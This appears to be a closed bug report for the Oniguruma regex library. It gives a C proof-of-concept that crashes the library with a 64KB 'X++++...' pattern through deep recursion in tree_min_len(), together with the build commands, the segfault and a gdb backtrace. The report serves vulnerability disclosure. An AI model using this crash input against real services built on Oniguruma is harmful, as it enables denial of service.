Closed
Description
If Oniguruma try to parse very deep regex nodes, it causes stack buffer overflow due to deep recursive calls to some parsing functions like optimize_nodes(), tree_min_len().
Here is a POC source code that simply executes onig_search() with very large regular expression "X+++++++++++++++++++++++++++++++ .... ".
/*
* oniguruma_sbof.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "oniguruma.h"
extern int exec(OnigSyntaxType* syntax, char* apattern, char* astr)
{
int r;
unsigned char *start, *range, *end;
regex_t* reg;
OnigErrorInfo einfo;
OnigRegion *region;
UChar* pattern = (UChar* )apattern;
UChar* str = (UChar* )astr;
r = onig_new(®, pattern, pattern + strlen((char* )pattern),
ONIG_OPTION_DEFAULT, ONIG_ENCODING_ASCII, syntax, &einfo);
if (r != ONIG_NORMAL) {
char s[ONIG_MAX_ERROR_MESSAGE_LEN];
onig_error_code_to_str((UChar* )s, r, &einfo);
fprintf(stderr, "ERROR: %s\n", s);
return -1;
}
region = onig_region_new();
end = str + strlen((char* )str);
start = str;
range = end;
r = onig_search(reg, str, end, start, range, region, ONIG_OPTION_NONE);
if (r >= 0) {
int i;
fprintf(stderr, "match at %d\n", r);
for (i = 0; i < region->num_regs; i++) {
fprintf(stderr, "%d: (%d-%d)\n", i, region->beg[i], region->end[i]);
}
}
else if (r == ONIG_MISMATCH) {
fprintf(stderr, "search fail\n");
}
else { /* error */
char s[ONIG_MAX_ERROR_MESSAGE_LEN];
onig_error_code_to_str((UChar* )s, r);
fprintf(stderr, "ERROR: %s\n", s);
onig_region_free(region, 1 /* 1:free self, 0:free contents only */);
onig_free(reg);
return -1;
}
onig_region_free(region, 1 /* 1:free self, 0:free contents only */);
onig_free(reg);
return 0;
}
#define REGEX_SZ 0x10000
extern int main(int argc, char* argv[])
{
int r, i;
OnigEncoding use_encs[] = { ONIG_ENCODING_ASCII };
char regex[REGEX_SZ] = {0};
regex[0] = 'X';
for (i = 1; i < REGEX_SZ; i++) regex[i] = '+';
onig_initialize(use_encs, sizeof(use_encs)/sizeof(use_encs[0]));
r = exec(ONIG_SYNTAX_RUBY, regex, "bgc");
onig_end();
return r;
}gcc -g -o oniguruma_stack oniguruma_stack.c -lonig
./oniguruma_stack
Segmentation fault (core dumped)
gdb -q ./oniguruma_syntax -c core
Reading symbols from ./oniguruma_stack...done.
[New LWP 19257]
Core was generated by `./oniguruma_stack'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x00007fe64f65fde5 in tree_min_len (
node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,
env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)
at regcomp.c:2839
2839 {
(gdb) bt
#0 0x00007fe64f65fde5 in tree_min_len (
node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,
env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)
at regcomp.c:2839
#1 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a570, env=0x7ffcc86b7470)
at regcomp.c:2942
#2 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a5b0, env=0x7ffcc86b7470)
at regcomp.c:2913
#3 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a5f0, env=0x7ffcc86b7470)
at regcomp.c:2942
#4 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a630, env=0x7ffcc86b7470)
at regcomp.c:2913
#5 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a670, env=0x7ffcc86b7470)
at regcomp.c:2942
#6 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a6b0, env=0x7ffcc86b7470)
at regcomp.c:2913
#7 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a6f0, env=0x7ffcc86b7470)
at regcomp.c:2942
#8 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a730, env=0x7ffcc86b7470)
at regcomp.c:2913
#9 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a770, env=0x7ffcc86b7470)
at regcomp.c:2942
#10 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a7b0, env=0x7ffcc86b7470)
at regcomp.c:2913
#11 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a7f0, env=0x7ffcc86b7470)
at regcomp.c
....
Metadata
Metadata
Assignees
Labels
No labels